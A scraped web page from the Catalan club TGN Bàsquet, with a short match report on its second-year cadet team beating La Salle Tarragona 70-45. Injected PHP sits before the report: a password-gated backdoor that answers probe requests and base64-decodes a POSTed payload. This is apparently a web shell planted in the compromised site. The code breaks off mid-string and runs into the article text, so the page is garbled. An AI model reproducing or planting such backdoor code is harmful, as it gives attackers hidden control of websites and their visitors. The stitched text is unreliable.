function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Els triples i la defensa en zona de la Salle Tarragona dificulten el triomf del cadet de segon any (70-45) - Tgn Bàsquet Club -

Els triples i la defensa en zona de la Salle Tarragona dificulten el triomf del cadet de segon any (70-45)

Updated: febrer 3, 2015

L’equip cadet masculí de segon any del TGN Bàsquet va vèncer contra la Salle Tarragona en un partit que es va igualar a a partir del segon període. Els locals van començar molt bé i, amb un parcial de 20-9 al primer quart encaraven molt bé el matx. En el segon quart, però, els visitants van situar una defensa en zona que va dificultar l’atac local. L’anotació passava a ser més baixa i la incertesa en el resultat va augmentar. L’equilibri, malgrat el domini en el rebot del TGN Bàsquet, es va mantenir fins el quart període quan un parcial de 20-3 en els últims 7 minuts de partit va sentenciar. Els 8 triples encistellats pels visitants van ser un maldecap per l’equip lila durant tot el partit que, però, es va poder endur el triomf.